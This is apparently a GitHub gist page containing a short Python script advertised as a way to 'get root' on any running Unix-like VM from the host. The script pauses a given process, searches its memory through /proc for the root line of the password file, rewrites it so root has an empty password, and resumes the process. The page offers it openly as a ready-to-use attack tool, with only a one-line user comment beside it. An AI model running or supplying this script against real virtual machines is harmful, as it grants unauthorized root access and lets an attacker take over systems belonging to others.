Last active
November 17, 2023 07:34
Star
You must be signed in to star a gist
Get root any running *nix VM by patching it's memory from the host.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import sys | |
import os | |
import signal | |
PATTERN = b"root:x:0:0:root" | |
REPLACE = b"root::00:0:root" | |
if len(sys.argv) != 2: | |
print("USAGE: python3 {} PID".format(sys.argv[0])) | |
print("(root privs required)") | |
exit() | |
pid = int(sys.argv[1]) | |
os.kill(pid, signal.SIGSTOP) | |
mem = open("/proc/{}/mem".format(pid), "wb+") | |
for mapping in open("/proc/{}/maps".format(pid)).readlines(): | |
if mapping.strip().split()[-1] in ["[vvar]", "[vdso]", "[stack]", "[vsyscall]"]: | |
continue | |
addrs = mapping.split()[0] | |
start, end = [int(x, 16) for x in addrs.split("-")] | |
mem.seek(start) | |
for block in range(start, end, 0x1000): | |
try: | |
buf = mem.read(0x1000) | |
if PATTERN in buf: | |
print(mapping.strip()) | |
print("w00t") | |
buf = buf.replace(PATTERN, REPLACE) | |
mem.seek(block) | |
mem.write(buf) | |
print("w00tw00t") | |
except OSError: | |
pass | |
os.kill(pid, signal.SIGCONT) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
wish you can react to a gist..
👍